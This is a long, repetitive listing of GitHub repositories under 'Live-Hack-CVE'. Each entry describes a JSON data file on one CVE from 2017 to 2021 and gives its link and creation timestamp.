**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-12117 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-12117](https://github.com/Live-Hack-CVE/CVE-2017-12117) create time: 2022-12-22T23:43:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-12118 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-12118](https://github.com/Live-Hack-CVE/CVE-2017-12118) create time: 2022-12-22T23:43:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-12119 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-12119](https://github.com/Live-Hack-CVE/CVE-2017-12119) create time: 2022-12-22T23:43:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-12120 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-12120](https://github.com/Live-Hack-CVE/CVE-2017-12120) create time: 2022-12-22T23:43:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-12121 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-12121](https://github.com/Live-Hack-CVE/CVE-2017-12121) create time: 2022-12-22T23:43:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-12122 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-12122](https://github.com/Live-Hack-CVE/CVE-2017-12122) create time: 2022-12-22T23:42:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-12130 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-12130](https://github.com/Live-Hack-CVE/CVE-2017-12130) create time: 2022-12-22T23:42:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-14443 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-14443](https://github.com/Live-Hack-CVE/CVE-2017-14443) create time: 2022-12-22T23:42:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-14444 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-14444](https://github.com/Live-Hack-CVE/CVE-2017-14444) create time: 2022-12-22T23:42:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-14445 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-14445](https://github.com/Live-Hack-CVE/CVE-2017-14445) create time: 2022-12-22T23:42:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-14446 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-14446](https://github.com/Live-Hack-CVE/CVE-2017-14446) create time: 2022-12-22T23:42:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-14466 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-14466](https://github.com/Live-Hack-CVE/CVE-2017-14466) create time: 2022-12-22T23:42:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-14462 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-14462](https://github.com/Live-Hack-CVE/CVE-2017-14462) create time: 2022-12-22T23:41:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-14463 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-14463](https://github.com/Live-Hack-CVE/CVE-2017-14463) create time: 2022-12-22T23:41:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-14464 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-14464](https://github.com/Live-Hack-CVE/CVE-2017-14464) create time: 2022-12-22T23:41:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-15473 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-15473](https://github.com/Live-Hack-CVE/CVE-2018-15473) create time: 2022-12-23T00:28:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-20685 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-20685](https://github.com/Live-Hack-CVE/CVE-2018-20685) create time: 2022-12-23T00:28:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-25032 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-25032](https://github.com/Live-Hack-CVE/CVE-2018-25032) create time: 2022-12-23T00:28:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-3872 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-3872](https://github.com/Live-Hack-CVE/CVE-2018-3872) create time: 2022-12-23T00:27:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-4842 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-4842](https://github.com/Live-Hack-CVE/CVE-2018-4842) create time: 2022-12-23T00:23:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-4848 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-4848](https://github.com/Live-Hack-CVE/CVE-2018-4848) create time: 2022-12-23T00:23:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4314 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4314](https://github.com/Live-Hack-CVE/CVE-2019-4314) create time: 2022-12-23T01:05:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4339 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4339](https://github.com/Live-Hack-CVE/CVE-2019-4339) create time: 2022-12-23T01:05:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4330 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4330](https://github.com/Live-Hack-CVE/CVE-2019-4330) create time: 2022-12-23T01:05:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4311 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4311](https://github.com/Live-Hack-CVE/CVE-2019-4311) create time: 2022-12-23T01:05:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3630 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3630](https://github.com/Live-Hack-CVE/CVE-2019-3630) create time: 2022-12-23T01:05:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3631 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3631](https://github.com/Live-Hack-CVE/CVE-2019-3631) create time: 2022-12-23T01:04:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3632 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3632](https://github.com/Live-Hack-CVE/CVE-2019-3632) create time: 2022-12-23T01:04:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3634 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3634](https://github.com/Live-Hack-CVE/CVE-2019-3634) create time: 2022-12-23T01:04:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3633 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3633](https://github.com/Live-Hack-CVE/CVE-2019-3633) create time: 2022-12-23T01:04:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-1552 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-1552](https://github.com/Live-Hack-CVE/CVE-2019-1552) create time: 2022-12-23T00:29:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6111 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6111](https://github.com/Live-Hack-CVE/CVE-2019-6111) create time: 2022-12-23T00:28:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-16905 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-16905](https://github.com/Live-Hack-CVE/CVE-2019-16905) create time: 2022-12-23T00:28:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6109 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6109](https://github.com/Live-Hack-CVE/CVE-2019-6109) create time: 2022-12-23T00:28:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6110 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6110](https://github.com/Live-Hack-CVE/CVE-2019-6110) create time: 2022-12-23T00:28:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-14274 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-14274](https://github.com/Live-Hack-CVE/CVE-2019-14274) create time: 2022-12-23T00:28:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-10936 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-10936](https://github.com/Live-Hack-CVE/CVE-2019-10936) create time: 2022-12-23T00:24:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-13924 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-13924](https://github.com/Live-Hack-CVE/CVE-2019-13924) create time: 2022-12-23T00:24:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-13933 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-13933](https://github.com/Live-Hack-CVE/CVE-2019-13933) create time: 2022-12-23T00:24:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19300 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19300](https://github.com/Live-Hack-CVE/CVE-2019-19300) create time: 2022-12-23T00:23:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3635 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3635](https://github.com/Live-Hack-CVE/CVE-2019-3635) create time: 2022-12-22T23:52:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3638 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3638](https://github.com/Live-Hack-CVE/CVE-2019-3638) create time: 2022-12-22T23:52:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-1649 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-1649](https://github.com/Live-Hack-CVE/CVE-2019-1649) create time: 2022-12-22T23:49:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-18413 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-18413](https://github.com/Live-Hack-CVE/CVE-2019-18413) create time: 2022-12-22T23:44:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-1045 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-1045](https://github.com/Live-Hack-CVE/CVE-2020-1045) create time: 2022-12-23T01:10:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7561 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7561](https://github.com/Live-Hack-CVE/CVE-2020-7561) create time: 2022-12-23T01:07:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13692 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13692](https://github.com/Live-Hack-CVE/CVE-2020-13692) create time: 2022-12-23T00:27:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8238 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8238](https://github.com/Live-Hack-CVE/CVE-2020-8238) create time: 2022-12-23T00:26:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-24368 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-24368](https://github.com/Live-Hack-CVE/CVE-2020-24368) create time: 2022-12-23T00:26:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8256 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8256](https://github.com/Live-Hack-CVE/CVE-2020-8256) create time: 2022-12-23T00:26:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-20277 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-20277](https://github.com/Live-Hack-CVE/CVE-2020-20277) create time: 2022-12-23T00:26:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28388 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28388](https://github.com/Live-Hack-CVE/CVE-2020-28388) create time: 2022-12-23T00:26:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7580 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7580](https://github.com/Live-Hack-CVE/CVE-2020-7580) create time: 2022-12-23T00:24:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28391 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28391](https://github.com/Live-Hack-CVE/CVE-2020-28391) create time: 2022-12-23T00:23:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28395 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28395](https://github.com/Live-Hack-CVE/CVE-2020-28395) create time: 2022-12-23T00:23:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35511 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35511](https://github.com/Live-Hack-CVE/CVE-2020-35511) create time: 2022-12-23T00:23:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8218 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8218](https://github.com/Live-Hack-CVE/CVE-2020-8218) create time: 2022-12-22T23:49:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14394 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14394](https://github.com/Live-Hack-CVE/CVE-2020-14394) create time: 2022-12-22T23:45:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-37712 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-37712](https://github.com/Live-Hack-CVE/CVE-2021-37712) create time: 2022-12-23T01:13:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-37701 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-37701](https://github.com/Live-Hack-CVE/CVE-2021-37701) create time: 2022-12-23T01:13:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40012 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40012](https://github.com/Live-Hack-CVE/CVE-2021-40012) create time: 2022-12-23T01:07:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-46853 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-46853](https://github.com/Live-Hack-CVE/CVE-2021-46853) create time: 2022-12-23T01:07:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-46741 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-46741](https://github.com/Live-Hack-CVE/CVE-2021-46741) create time: 2022-12-23T01:07:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-42550 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-42550](https://github.com/Live-Hack-CVE/CVE-2021-42550) create time: 2022-12-23T01:07:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3826 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3826](https://github.com/Live-Hack-CVE/CVE-2021-3826) create time: 2022-12-23T01:07:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3477 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3477](https://github.com/Live-Hack-CVE/CVE-2021-3477) create time: 2022-12-23T01:06:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3479 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3479](https://github.com/Live-Hack-CVE/CVE-2021-3479) create time: 2022-12-23T01:06:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20296 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20296](https://github.com/Live-Hack-CVE/CVE-2021-20296) create time: 2022-12-23T01:06:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3478 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3478](https://github.com/Live-Hack-CVE/CVE-2021-3478) create time: 2022-12-23T01:06:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20299 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20299](https://github.com/Live-Hack-CVE/CVE-2021-20299) create time: 2022-12-23T01:05:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20302 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20302](https://github.com/Live-Hack-CVE/CVE-2021-20302) create time: 2022-12-23T01:05:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20300 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20300](https://github.com/Live-Hack-CVE/CVE-2021-20300) create time: 2022-12-23T01:05:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20303 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20303](https://github.com/Live-Hack-CVE/CVE-2021-20303) create time: 2022-12-23T01:05:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20298 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20298](https://github.com/Live-Hack-CVE/CVE-2021-20298) create time: 2022-12-23T01:05:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3859 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3859](https://github.com/Live-Hack-CVE/CVE-2021-3859) create time: 2022-12-23T01:05:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27918 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27918](https://github.com/Live-Hack-CVE/CVE-2021-27918) create time: 2022-12-23T00:25:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27919 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27919](https://github.com/Live-Hack-CVE/CVE-2021-27919) create time: 2022-12-23T00:25:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28940 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28940](https://github.com/Live-Hack-CVE/CVE-2021-28940) create time: 2022-12-23T00:25:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3927 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3927](https://github.com/Live-Hack-CVE/CVE-2021-3927) create time: 2022-12-23T00:25:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29439 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29439](https://github.com/Live-Hack-CVE/CVE-2021-29439) create time: 2022-12-23T00:25:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29472 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29472](https://github.com/Live-Hack-CVE/CVE-2021-29472) create time: 2022-12-23T00:25:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39172 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39172](https://github.com/Live-Hack-CVE/CVE-2021-39172) create time: 2022-12-23T00:24:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-37209 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-37209](https://github.com/Live-Hack-CVE/CVE-2021-37209) create time: 2022-12-23T00:23:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38997 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38997](https://github.com/Live-Hack-CVE/CVE-2021-38997) create time: 2022-12-22T23:51:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36751 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36751](https://github.com/Live-Hack-CVE/CVE-2021-36751) create time: 2022-12-22T23:50:15Z

